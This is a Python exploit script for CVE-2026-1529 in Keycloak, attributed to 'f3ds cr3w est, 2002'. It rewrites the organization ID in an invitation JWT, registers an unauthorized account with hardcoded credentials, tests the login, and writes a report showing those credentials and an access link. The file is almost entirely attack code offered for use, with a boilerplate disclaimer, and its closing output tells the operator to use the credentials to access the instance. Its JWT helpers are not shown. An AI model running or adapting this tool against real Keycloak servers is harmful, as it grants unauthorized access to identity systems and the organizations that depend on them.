#!/usr/bin/env python3
"""
CVE-2026-1529 Keycloak Exploit Tool
Keycloak: Unauthorized organization registration via improper invitation token validation
by f3ds cr3w est, 2002

Command-line driver that runs, in order: a target reachability check, creation
(or reuse) of an invitation token, rewriting of that token's organization ID,
a registration request carrying the rewritten token, a login test, and a
plain-text report. The JWT and HTTP work is delegated to the project-local
``utils`` helpers.

This tool is for educational and security testing purposes only. Use only on
systems you have explicit permission to test.
"""

import argparse
import json
import logging
import sys
import os
from datetime import datetime
from typing import Dict, Any, Optional
from urllib.parse import urlparse

# Add utils directory to path
sys.path.append(os.path.join(os.path.dirname(__file__), 'utils'))

from utils.jwt_utils import JWTManipulator
from utils.http_utils import HTTPClient
from utils.crypto_utils import CryptoUtils

# Setup logging: everything goes to stdout; no log file is configured here.
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[
        logging.StreamHandler(sys.stdout)
    ]
)
logger = logging.getLogger(__name__)


class KeycloakExploit:
    """Main exploit class for CVE-2026-1529.

    Holds the target URL, the effective configuration, and the HTTP / JWT
    helper objects. Every public step method is best-effort: it logs failures
    and returns a falsy value instead of raising.
    """

    def __init__(self, target_url: str, config_path: Optional[str] = None):
        """Prepare helpers and output directories for one target.

        Args:
            target_url: Base URL of the target; trailing slashes are removed.
            config_path: Optional path to a JSON configuration file. When
                omitted, ``config/default_config.json`` is tried, then the
                built-in defaults.
        """
        self.target_url = target_url.rstrip('/')
        self.config = self._load_config(config_path)
        self.http_client = HTTPClient(
            self.target_url,
            timeout=self.config['exploit']['timeout'],
            max_retries=self.config['exploit']['max_retries'],
        )
        self.jwt_manipulator = JWTManipulator(
            secret_key=self.config['jwt']['secret_key'],
            algorithm=self.config['jwt']['algorithm'],
        )

        # Create output directories (relative to the current working directory)
        for directory in ('logs', 'output', 'output/reports'):
            os.makedirs(directory, exist_ok=True)

        logger.info("Initialized exploit for target: %s", self.target_url)

    @staticmethod
    def _default_config() -> Dict[str, Any]:
        """Return a fresh copy of the built-in default configuration."""
        return {
            "exploit": {
                "default_username": "admin_user_2026",
                "default_password": "KeycloakCVE2026!",
                "default_email": "exploit@admin.com",
                "timeout": 30,
                "max_retries": 3
            },
            "jwt": {
                "algorithm": "HS256",
                "secret_key": "keycloak-cve-2026-1529-exploit",
                "token_expiry": 3600
            },
            "target": {
                "endpoints": {
                    "realms": "/realms",
                    "organizations": "/organizations",
                    "register": "/register",
                    "login": "/login"
                },
                "headers": {
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                    "Accept": "application/json",
                    "Content-Type": "application/json"
                }
            },
            "output": {
                "log_level": "INFO",
                "save_reports": True,
                "report_format": "txt"
            }
        }

    @staticmethod
    def _merge_config(defaults: Dict[str, Any], overrides: Dict[str, Any]) -> Dict[str, Any]:
        """Return ``defaults`` with ``overrides`` layered on top, recursing into nested dicts."""
        merged = dict(defaults)
        for key, value in overrides.items():
            if isinstance(value, dict) and isinstance(merged.get(key), dict):
                merged[key] = KeycloakExploit._merge_config(merged[key], value)
            else:
                merged[key] = value
        return merged

    def _load_config(self, config_path: Optional[str] = None) -> Dict[str, Any]:
        """Load configuration from file, falling back to built-in defaults.

        Values read from the file are merged over the defaults, so a partial
        file cannot leave out keys that the rest of the class indexes
        directly (e.g. ``config['exploit']['timeout']``).

        Args:
            config_path: Path to a JSON file; ``config/default_config.json``
                is used when this is empty or ``None``.

        Returns:
            The effective configuration dictionary.
        """
        defaults = self._default_config()
        path = config_path or 'config/default_config.json'

        try:
            with open(path, 'r', encoding='utf-8') as f:
                loaded = json.load(f)
        except (OSError, ValueError) as e:
            # ValueError covers json.JSONDecodeError and UnicodeDecodeError.
            logger.error("Failed to load configuration: %s", e)
            return defaults

        if not isinstance(loaded, dict):
            logger.error(
                "Failed to load configuration: top-level JSON value in %s is not an object",
                path,
            )
            return defaults

        logger.info("Configuration loaded successfully")
        return self._merge_config(defaults, loaded)

    def check_target_vulnerability(self) -> bool:
        """Check if target is vulnerable to CVE-2026-1529.

        This is a heuristic only: it returns True when the HTTP helper's
        health check passes and the configured organizations endpoint
        responds to ``test_endpoint``. The detected version is logged but
        not compared against anything.

        Returns:
            True if both checks pass, False otherwise (including on error).
        """
        try:
            logger.info("Checking target vulnerability...")

            # Check if Keycloak is accessible
            if not self.http_client.check_keycloak_health():
                logger.error("Target is not accessible or not a Keycloak instance")
                return False

            # Detect Keycloak version (informational only)
            version = self.http_client.detect_keycloak_version()
            if version:
                logger.info("Target Keycloak version: %s", version)

            # Test organization endpoints
            org_endpoint = self.config['target']['endpoints']['organizations']
            if not self.http_client.test_endpoint(org_endpoint):
                logger.warning("Organization endpoint not accessible")
                return False

            logger.info("Target appears to be vulnerable to CVE-2026-1529")
            return True

        except Exception as e:  # helper exception types are not visible here
            logger.error("Vulnerability check failed: %s", e)
            return False

    def generate_invitation_token(self, org_id: str, email: str) -> Optional[str]:
        """Generate an invitation token for testing.

        Args:
            org_id: Organization ID passed to the JWT helper.
            email: Email address passed to the JWT helper.

        Returns:
            The token produced by ``JWTManipulator.generate_invitation_token``,
            or None if the helper raised.
        """
        try:
            logger.info("Generating invitation token for org: %s", org_id)

            # Generate a basic token for testing
            token = self.jwt_manipulator.generate_invitation_token(
                org_id=org_id,
                email=email,
                expires_in=self.config['jwt']['token_expiry'],
            )

            logger.info("Invitation token generated successfully")
            return token

        except Exception as e:  # helper exception types are not visible here
            logger.error("Failed to generate invitation token: %s", e)
            return None

    def manipulate_token(self, token: str, new_org_id: str,
                         new_email: Optional[str] = None) -> Optional[str]:
        """Manipulate JWT token for exploit.

        Args:
            token: Token to rewrite; rejected if the JWT helper's structure
                validation fails.
            new_org_id: Organization ID handed to the JWT helper.
            new_email: Optional email handed to the JWT helper.

        Returns:
            The helper's rewritten token, or None on validation failure or error.
        """
        try:
            logger.info("Manipulating JWT token...")

            # Validate token structure
            if not self.jwt_manipulator.validate_token_structure(token):
                logger.error("Invalid token structure")
                return None

            # Manipulate token
            manipulated_token = self.jwt_manipulator.manipulate_token(
                token=token,
                new_org_id=new_org_id,
                new_email=new_email,
            )

            logger.info("JWT token manipulation completed")
            return manipulated_token

        except Exception as e:  # helper exception types are not visible here
            logger.error("Token manipulation failed: %s", e)
            return None

    def register_user_with_token(self, token: str, username: str,
                                 password: str, email: str) -> bool:
        """Register user using manipulated token.

        Posts the registration payload to the configured ``register``
        endpoint.

        Returns:
            True if the response has ``status == 'created'`` or a truthy
            ``success`` field; False otherwise, including when the HTTP
            helper returns an empty response or raises.
        """
        try:
            logger.info("Attempting user registration with manipulated token...")

            # Prepare registration data
            registration_data = {
                "username": username,
                "password": password,
                "email": email,
                "token": token,
                "firstName": "Exploit",
                "lastName": "User"
            }

            # Make registration request
            register_endpoint = self.config['target']['endpoints']['register']
            response = self.http_client.post(register_endpoint, data=registration_data)

            # Guard against an empty/None response before reading fields,
            # matching the check used in test_user_login.
            if response and (response.get('status') == 'created' or response.get('success')):
                logger.info("User registration successful")
                return True

            logger.error("User registration failed: %s", response)
            return False

        except Exception as e:  # helper exception types are not visible here
            logger.error("Registration failed: %s", e)
            return False

    def test_user_login(self, username: str, password: str) -> bool:
        """Test user login with created credentials.

        Posts a password-grant payload to the configured ``login`` endpoint.

        Returns:
            True if the response contains ``access_token``; False otherwise.
        """
        try:
            logger.info("Testing user login...")

            login_data = {
                "username": username,
                "password": password,
                "grant_type": "password"
            }

            login_endpoint = self.config['target']['endpoints']['login']
            response = self.http_client.post(login_endpoint, data=login_data)

            if response and 'access_token' in response:
                logger.info("User login successful")
                return True

            logger.error("User login failed")
            return False

        except Exception as e:  # helper exception types are not visible here
            logger.error("Login test failed: %s", e)
            return False

    def generate_login_link(self, username: str) -> str:
        """Generate login link for the created user.

        Args:
            username: Accepted for interface compatibility; not used when
                building the link.

        Returns:
            ``<scheme>://<netloc>/realms/master/account`` derived from the
            target URL (the realm name is fixed to ``master``), or the target
            URL itself if building the link fails.
        """
        try:
            parsed_url = urlparse(self.target_url)
            login_url = f"{parsed_url.scheme}://{parsed_url.netloc}/realms/master/account"

            logger.info("Generated login link: %s", login_url)
            return login_url

        except Exception as e:
            logger.error("Failed to generate login link: %s", e)
            return self.target_url

    @staticmethod
    def _token_preview(value: Any, limit: int = 50) -> str:
        """Return a short display form of a token: 'N/A' if empty, ellipsis only if truncated."""
        if not value:
            return 'N/A'
        text = str(value)
        return text if len(text) <= limit else text[:limit] + "..."

    def generate_report(self, results: Dict[str, Any]) -> str:
        """Generate exploit report.

        Writes a plain-text summary to
        ``output/reports/exploit_report_<timestamp>.txt``. Note that the
        report includes the username, password and email from ``results``
        in clear text.

        Args:
            results: Result dictionary as produced by ``run_exploit``.

        Returns:
            The report file path, or an empty string if writing failed.
        """
        try:
            # One timestamp for both the filename and the Date field so they agree.
            now = datetime.now()
            report_filename = f"output/reports/exploit_report_{now.strftime('%Y%m%d_%H%M%S')}.txt"

            def status(key: str) -> str:
                return 'SUCCESS' if results.get(key) else 'FAILED'

            report_lines = [
                "",
                "CVE-2026-1529 Exploit Report",
                "============================",
                f"Target: {self.target_url}",
                f"Date: {now.strftime('%Y-%m-%d %H:%M:%S')}",
                "by f3ds cr3w est, 2002",
                "",
                "Exploit Results:",
                "---------------",
                f"Vulnerability Check: {status('vulnerable')}",
                f"Token Generation: {status('token_generated')}",
                f"Token Manipulation: {status('token_manipulated')}",
                f"User Registration: {status('user_registered')}",
                f"User Login: {status('user_login')}",
                "",
                "Created User:",
                "-------------",
                f"Username: {results.get('username', 'N/A')}",
                f"Password: {results.get('password', 'N/A')}",
                f"Email: {results.get('email', 'N/A')}",
                "",
                "Login Link:",
                "-----------",
                f"{results.get('login_link', 'N/A')}",
                "",
                "Technical Details:",
                "-----------------",
                f"Original Token: {self._token_preview(results.get('original_token'))}",
                f"Manipulated Token: {self._token_preview(results.get('manipulated_token'))}",
                f"Organization ID: {results.get('org_id', 'N/A')}",
                "",
                "CVE Details:",
                "-----------",
                "CVE ID: CVE-2026-1529",
                "Description: Keycloak: Unauthorized organization registration via improper invitation token validation",
                "CVSS: Not yet assigned",
                "Attack Vector: Network",
                "Attack Complexity: Low",
                "",
                "Exploit Method:",
                "---------------",
                "1. Generate or obtain organization invitation token",
                "2. Manipulate JWT payload to change organization ID",
                "3. Use manipulated token to register unauthorized user",
                "4. Test login with created credentials",
                "5. Provide login link for access",
                "",
                "Security Advisory:",
                "-----------------",
                "This exploit demonstrates a critical vulnerability in Keycloak that allows",
                "unauthorized organization registration. Organizations should apply the latest",
                "security patches and implement proper token validation.",
                "",
                "Disclaimer:",
                "-----------",
                "This tool is for educational and security testing purposes only.",
                "Use only on systems you have explicit permission to test.",
                "",
            ]

            with open(report_filename, 'w', encoding='utf-8') as f:
                f.write("\n".join(report_lines))

            logger.info("Report generated: %s", report_filename)
            return report_filename

        except Exception as e:  # reporting is best-effort and must not abort the run
            logger.error("Failed to generate report: %s", e)
            return ""

    def run_exploit(self, custom_token: Optional[str] = None,
                    custom_org_id: Optional[str] = None) -> Dict[str, Any]:
        """Run the complete exploit.

        Args:
            custom_token: Existing invitation token to use instead of
                generating one.
            custom_org_id: Organization ID for the generated token. It is
                only consulted when ``custom_token`` is not given.

        Returns:
            A dictionary of per-step booleans plus the credentials, tokens,
            organization ID and login link used. ``report_file`` is added
            when report saving is enabled and the run reaches that step.
            The run stops early (returning the partial dictionary) if the
            vulnerability check, token generation or token manipulation
            fails.
        """
        results = {
            'vulnerable': False,
            'token_generated': False,
            'token_manipulated': False,
            'user_registered': False,
            'user_login': False,
            'username': '',
            'password': '',
            'email': '',
            'login_link': '',
            'original_token': '',
            'manipulated_token': '',
            'org_id': ''
        }

        try:
            logger.info("Starting CVE-2026-1529 exploit...")

            # Step 1: Check vulnerability
            logger.info("Step 1: Checking target vulnerability...")
            if not self.check_target_vulnerability():
                logger.error("Target is not vulnerable")
                return results

            results['vulnerable'] = True

            # Step 2: Generate or use provided token
            logger.info("Step 2: Generating invitation token...")
            if custom_token:
                # A supplied token is used as-is; 'token_generated' stays False.
                results['original_token'] = custom_token
                token = custom_token
            else:
                # Generate test token
                org_id = custom_org_id or "test_org_123"
                email = self.config['exploit']['default_email']
                token = self.generate_invitation_token(org_id, email)
                if token:
                    results['original_token'] = token
                    results['token_generated'] = True

            if not token:
                logger.error("Failed to generate token")
                return results

            # Step 3: Manipulate token
            logger.info("Step 3: Manipulating JWT token...")
            new_org_id = "exploited_org_" + CryptoUtils.generate_secure_username("", 8)
            manipulated_token = self.manipulate_token(token, new_org_id)

            if not manipulated_token:
                logger.error("Failed to manipulate token")
                return results

            results['token_manipulated'] = True
            results['manipulated_token'] = manipulated_token
            results['org_id'] = new_org_id

            # Step 4: Generate user credentials (taken from configuration)
            logger.info("Step 4: Generating user credentials...")
            username = self.config['exploit']['default_username']
            password = self.config['exploit']['default_password']
            email = self.config['exploit']['default_email']

            results['username'] = username
            results['password'] = password
            results['email'] = email

            # Step 5: Register user
            logger.info("Step 5: Registering user with manipulated token...")
            if self.register_user_with_token(manipulated_token, username, password, email):
                results['user_registered'] = True

                # Step 6: Test login
                logger.info("Step 6: Testing user login...")
                if self.test_user_login(username, password):
                    results['user_login'] = True

                # Step 7: Generate login link
                results['login_link'] = self.generate_login_link(username)

            # Generate report
            if self.config['output']['save_reports']:
                report_file = self.generate_report(results)
                results['report_file'] = report_file

            # Report the real outcome rather than unconditionally claiming success.
            if results['user_registered'] and results['user_login']:
                logger.info("Exploit completed successfully")
            else:
                logger.warning("Exploit run finished without a successful registration and login")
            return results

        except Exception as e:  # top-level boundary: always hand back partial results
            logger.error("Exploit failed: %s", e)
            return results


def main():
    """Main function: parse arguments, run the exploit, print a summary.

    Exits with status 1 on an invalid URL, a target that fails the
    vulnerability check, a failed run, a keyboard interrupt, or an
    unexpected error.
    """
    parser = argparse.ArgumentParser(
        description='CVE-2026-1529 Keycloak Exploit Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python keycloak-exploit.py https://target-keycloak.com
  python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target-keycloak.com
  python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
  python keycloak-exploit.py -h
        """
    )

    parser.add_argument('target', help='Target Keycloak URL (IP or domain)')
    parser.add_argument('-t', '--token', help='Custom invitation token to use')
    parser.add_argument('-o', '--org-id', help='Custom organization ID')
    parser.add_argument('-c', '--config', help='Path to configuration file')
    parser.add_argument('-d', '--debug', action='store_true', help='Enable debug logging')
    parser.add_argument('-v', '--version', action='version',
                        version='CVE-2026-1529 Exploit Tool v1.0 by f3ds cr3w est, 2002')

    args = parser.parse_args()

    # Validate target URL
    if not CryptoUtils.validate_url_format(args.target):
        print("Error: Invalid target URL format")
        sys.exit(1)

    # Setup logging level
    if args.debug:
        logging.getLogger().setLevel(logging.DEBUG)

    try:
        # Run exploit
        exploit = KeycloakExploit(args.target, args.config)
        results = exploit.run_exploit(args.token, args.org_id)

        # Display results
        print("\n" + "="*60)
        print("CVE-2026-1529 EXPLOIT RESULTS")
        print("="*60)

        if results['vulnerable']:
            print("✓ Target is vulnerable to CVE-2026-1529")
        else:
            print("✗ Target is not vulnerable")
            sys.exit(1)

        if results['user_registered'] and results['user_login']:
            print("\n🎯 EXPLOIT SUCCESSFUL!")
            print(f"Username: {results['username']}")
            print(f"Password: {results['password']}")
            print(f"Email: {results['email']}")
            print(f"Login Link: {results['login_link']}")

            if 'report_file' in results:
                print(f"\n📄 Report saved to: {results['report_file']}")

            print("\n🔐 Use the provided credentials to access the Keycloak instance!")
            print("⚠️ This demonstrates unauthorized access due to CVE-2026-1529")

        else:
            print("\n❌ EXPLOIT FAILED!")
            # Logging goes to stdout only; no log file is written by this script.
            print("Check the log output above for details")
            sys.exit(1)

        print("\n" + "="*60)
        print("by f3ds cr3w est, 2002")
        print("="*60)

    except KeyboardInterrupt:
        print("\n\n⚠️ Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"\n❌ Error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()